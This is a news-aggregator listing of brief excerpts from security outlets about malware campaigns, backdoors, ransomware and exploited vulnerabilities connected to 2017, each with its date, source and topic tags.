Schneier on Security

JUNE 21, 2019

In 2017, some Android phones came with a backdoor pre-installed : Criminals in 2017 managed to get an advanced backdoor preinstalled on Android devices before they left the factories of manufacturers, Google researchers confirmed on Thursday. That meant the malware could directly tamper with every installed app.

Firmware 279

Firmware Manufacturing Malware Mobile 279

Schneier on Security

FEBRUARY 16, 2021

Interesting story about a barcode scanner app that has been pushing malware on to Android phones. It’s been around since 2017 and is owned by the Ukrainian company Lavabird Ldt. It is baffling to me that an app developer with a popular app would turn it into malware. The app is called Barcode Scanner.

Advertising 316

Advertising Malware 316

Krebs on Security

MAY 14, 2019

Microsoft today is taking the unusual step of releasing security updates for unsupported but still widely-used Windows operating systems like XP and Windows 2003 , citing the discovery of a “wormable” flaw that the company says could be used to fuel a fast-moving malware threat like the WannaCry ransomware attacks of 2017.

Malware 266

Malware Ransomware Authentication 266

Krebs on Security

FEBRUARY 17, 2021

million in a 2018 ATM cash out scheme targeting a Pakistani bank; and a total of $112 million in virtual currencies stolen between 2017 and 2020 from cryptocurrency companies in Slovenia, Indonesia and New York. In reality, prosecutors say, the programs were malware or downloaded malware after the applications were installed.

Cryptocurrency 346

Cryptocurrency Financial Services Banking Government 346

Security Boulevard

JANUARY 17, 2022

Ukraine is again under malware attack. And the tactics look strikingly similar to 2017’s NotPetya hack by the Russian GRU. The post ‘Russian’ Wiper Malware: ‘Prelude to war’ in Ukraine appeared first on Security Boulevard.

Malware 144

Malware Hacking Social Engineering Engineering 144

Tech Republic Security

FEBRUARY 15, 2022

Dubbed TA2541 by Proofpoint researchers, the group has been attacking targets in several critical industries since 2017 with phishing emails and cloud-hosted malware droppers. The post Researchers discover common threat actor behind aviation and defense malware campaigns appeared first on TechRepublic.

Malware 148

Malware Phishing 148

Malwarebytes

OCTOBER 18, 2024

The vulnerability, tracked as CVE-2024-44133 was fixed in the September 16 update for Mac Studio (2022 and later), iMac (2019 and later), Mac Pro (2019 and later), Mac Mini (2018 and later), MacBook Air (2020 and later), MacBook Pro (2018 and later), and iMac Pro (2017 and later).

Adware 145

Adware Spyware Mobile Technology 145

Krebs on Security

AUGUST 14, 2020

Sources close to the investigation tell KrebsOnSecurity the malware is known as Defray. Defray was first spotted in 2017, and its purveyors have a history of specifically targeting companies in the healthcare space. R1 RCM declined to discuss the strain of ransomware it is battling or how it was compromised.

Ransomware 363

Ransomware Healthcare Insurance Phishing 363

Security Affairs

DECEMBER 17, 2024

The FBI warned of a fresh wave of HiatusRAT malware attacks targeting internet-facing Chinese-branded web cameras and DVRs. The Federal Bureau of Investigation (FBI) released a Private Industry Notification (PIN) to warn of HiatusRAT malware campaigns targeting Chinese-branded web cameras and DVRs. ” reads the PIN report.

Architecture 112

Architecture Internet Internet Malware 112

Security Boulevard

NOVEMBER 7, 2022

What’s the best way for a company to test its malware defenses in real-life scenarios? In fact, a 2017 report predicted that by 2020 businesses will be hit by a threat actor every eleven seconds. The post Safely Test Your Malware, Ransomware and Virus Defenses appeared first on Security Boulevard.

Malware 134

Malware Ransomware Security Awareness Cybersecurity 134

Security Affairs

OCTOBER 30, 2023

A sophisticated malware tracked as StripedFly remained undetected for five years and infected approximately one million devices. Researchers from Kaspersky discovered a sophisticated malware, dubbed StripedFly, that remained under the radar for five years masquerading as a cryptocurrency miner. “What was the real purpose?

Malware 141

Malware Cryptocurrency Ransomware Hacking 141

The Hacker News

AUGUST 20, 2021

ShadowPad, an infamous Windows backdoor that allows attackers to download further malicious modules or steal data, has been put to use by five different Chinese threat clusters since 2017.

Malware 145

Malware 145

Penetration Testing

SEPTEMBER 12, 2024

In a newly uncovered advanced malware campaign, threat actors are using a complex, fileless approach to deliver the Remcos Remote Access Trojan (RAT), leveraging a benign-looking Excel document as the... The post Fileless Remcos RAT Campaign Leverages CVE-2017-0199 Flaw appeared first on Cybersecurity News.

Malware 88

Malware Cybersecurity 88

Krebs on Security

APRIL 7, 2022

The DOJ said it did not seek to disinfect compromised devices; instead, it obtained court orders to remove the Cyclops Blink malware from its “command and control” servers — the hidden machines that allowed the attackers to orchestrate the activities of the botnet. energy facilities. ” HYDRA. . ” HYDRA. .

Marketing 310

Marketing Energy and Utilities Malware Ransomware 310

The Hacker News

APRIL 10, 2023

Over one million WordPress websites are estimated to have been infected by an ongoing campaign to deploy malware called Balada Injector since 2017. The massive campaign, per GoDaddy's Sucuri, "leverages all known and recently discovered theme and plugin vulnerabilities" to breach WordPress sites.

Malware 144

Malware 144

CyberSecurity Insiders

JULY 27, 2022

A novel malware named CosmicStrand is said to be targeting the old motherboards offered by Asus and Gigabyte and the crux is that it can survive operating system re-installs and it survives in Unified Extensible Firmware Interface (UEFIs) unlike just the storage drive.

Malware 129

Malware Firmware Antivirus Marketing 129

Security Affairs

OCTOBER 19, 2024

APT37 exploited this flaw to trick victims into downloading malware on their desktops with the toast ad program installed. organizations and individuals involved in Korean Peninsula reunification efforts); Researchers from FireEye revealed that the nation-state actor also targeted entities in Japan, Vietnam, and even the Middle East in 2017.

Internet 144

Internet Internet Engineering Malware 144

Krebs on Security

JULY 29, 2019

Marcus Hutchins , the “accidental hero” who helped arrest the spread of the global WannaCry ransomware outbreak in 2017, will receive no jail time for his admitted role in authoring and selling malware that helped cyberthieves steal online bank account credentials from victims, a federal judge ruled Friday.

Banking 232

Banking Malware Government Education 232

The Hacker News

JANUARY 16, 2023

Central Intelligence Agency (CIA)'s Hive multi-platform malware suite, the source code of which was released by WikiLeaks in November 2017. Unidentified threat actors have deployed a new backdoor that borrows its features from the U.S.

Malware 144

Malware 144

SecureList

MARCH 10, 2025

We continued to monitor the group throughout the rest of the year, observing intense activity that included updates to SideWinder’s toolset and the creation of a massive new infrastructure to spread malware and control compromised systems. Additionally, they change the names and paths of their malicious files.

Energy and Utilities 120

Energy and Utilities Malware Government Phishing 120

Schneier on Security

MARCH 9, 2021

WannaCry was a 2017 cyberattack, based on a NSA-discovered and Russia-stolen-and-published Windows vulnerability. Even if we assume that the report is self-serving to the company that wrote it, and that the statistic is not generally representative, this is still a disaster. The number should be 0%.

Technology 363

Technology Software Malware 363

Security Affairs

DECEMBER 21, 2023

Threat actors are exploiting an old Microsoft Office vulnerability, tracked as CVE-2017-11882, to spread the Agent Tesla malware. Threat actors are exploiting an old Microsoft Office vulnerability, tracked as CVE-2017-11882 (CVSS score: 7.8), as part of phishing campaigns to spread the Agent Tesla malware.

Malware 137

Malware Phishing Spyware Cyber threats 137

CyberSecurity Insiders

JANUARY 17, 2022

Microsoft has issued an official warning to all IT and not-for-profit organizations, along with some critical government organizations across Ukraine, that their digital infrastructure could be targeted by a dreaded data wiping malware campaign.

Malware 139

Malware Government Technology Authentication 139

The Last Watchdog

MAY 15, 2025

Recent Guardz research shows that more than 15% of the tools advertised on dark web forums target vulnerabilities like EternalBlue , a known Windows flaw dating back to 2017 that still hasnt been fully remediated across the globe. In some cases, pre-built ransomware kits complete with instructions are sold for just a few hundred dollars.

Small Business 113

Small Business Cybercrime Cyber Insurance Phishing 113

Malwarebytes

OCTOBER 28, 2021

Unlike traditional malware, which relies on a file being written to a disk, fileless malware is intended to be memory resident only, ideally leaving no trace after its execution. For an attacker, fileless malware has two major advantages: There is no file for traditional anti-virus software to detect. Is fileless malware new?

Malware 138

Malware Artificial Intelligence Software Ransomware 138

Schneier on Security

JANUARY 25, 2022

billion in business interruption losses from the Notpetya cyber attack of 2017 which were claimed against “all risks” property re/insurance policies providing coverage for losses resulting from destruction or corruption of computer data and software. Merck suffered US$1.4

Insurance 225

Insurance Cyber Attacks Government Malware 225

Security Boulevard

MARCH 20, 2025

Amost a dozen state-sponsored threat groups from Russia, China, and North Korea have been exploiting a security flaw in WIndows in attacks on governments and critical infrastructure that date back to 2017. According to Trend Micro's VDI unit, Microsoft has no plans to patch the vulnerability.

Government 100

Government Social Engineering Engineering Malware 100

SecureList

OCTOBER 15, 2024

RTF exploit RTF files were specifically crafted by the attacker to exploit CVE-2017-11882, a memory corruption vulnerability in Microsoft Office software. The malware uses different strings to load libraries and functions required for execution. In particular, Avast and AVG solutions are of interest to the malware.

Malware 144

Malware Encryption Architecture Phishing 144

Security Affairs

OCTOBER 16, 2023

Researchers uncovered an ongoing campaign abusing popular messaging platforms Skype and Teams to distribute the DarkGate malware. The threat actors abused popular messaging platforms such as Skype and Teams to deliver a script used as a loader for a second-stage payload, which was an AutoIT script containing the DarkGate malware.

Malware 140

Malware Cryptocurrency Accountability Cybercrime 140

Security Affairs

APRIL 12, 2024

Proofpoint researchers observed a threat actor, tracked as TA547, targeting German organizations with an email campaign delivering the Rhadamanthys malware. The security firm pointed out that this is the first TA547 group to use this malware family. The experts also discovered the attempts of using LLM in malware campaigns.

Malware 137

Malware Social Engineering Retail Engineering 137

Security Affairs

DECEMBER 29, 2021

China-linked BlackTech cyberespionage group was targeting Japanese companies using new malware tracked as ‘Flagpro’. Researchers from NTT Security reported that China-linked BlackTech cyberespionage group targeted Japanese companies using new malware tracked as ‘Flagpro’. “It means that they are actively developing new malwares.

Malware 145

Malware Phishing Passwords Media 145

Malwarebytes

MARCH 5, 2022

The Formbook malware is an information stealer that is in use by many threat actors. The embedded object downloaded a remote template that exploits CVE-2017-11882 to download and execute the FormBook malware. Recently, the Malwarebytes Threat Intelligence Team found a Formbook campaign targeting oil and gas companies.

Malware 139

Malware Manufacturing Marketing 139

Security Affairs

FEBRUARY 2, 2024

The Computer Emergency Response Team in Ukraine (CERT-UA) reported that a PurpleFox malware campaign had already infected at least 2,000 computers in the country. Experts defined DirtyMoe as a complex malware that has been designed as a modular system. ” reads the alert published by CERT-UA.

Malware 139

Malware Internet Internet DDOS 139

Security Affairs

DECEMBER 15, 2023

Experts uncovered a new Go-based multi-platform malware, tracked as NKAbuse, which is the first malware abusing NKN technology. Researchers from Kaspersky’s Global Emergency Response Team ( GERT ) and GReAT uncovered a new multiplatform malware dubbed NKAbuse. ” reads the report published by Kaspersky.

Malware 143

Malware Architecture Technology DDOS 143

Heimadal Security

OCTOBER 27, 2022

The North Korean cyberespionage group known as Kimsuky has been observed exploiting three different Android malware targeted specifically at South Korean users. Kimsuky, also known as Velvet Chollima, Thallium, or Black Banshee, is a North Korean-based cybercrime group with operations going back to 2017.

Malware 119

Malware Cybercrime Cybersecurity 119

Krebs on Security

FEBRUARY 4, 2020

In 2012 KrebsOnSecurity wrote about the plight of Yuriy “Jtk” Konovalenko , a then 30-year-old Ukrainian man who was rounded up as part of an international crackdown on an organized crime gang that used the ZeuS malware to steal tens of millions of dollars from companies and consumers. Attorney Adam Alexander.

Internet 347

Internet Internet Government Accountability 347

Security Affairs

JANUARY 21, 2025

Researchers found over 100 servers distributing Mirai malware and communicating with compromised IPs, indicating the campaign is ongoing. “Mirai malware, here dubbed as Murdoc Botnet, is a prominent malware family for *nix systems. It mainly targets vulnerable AVTECH and Huawei devices. ” reads the advisory.

IoT 86

IoT Malware Hacking Cybercrime 86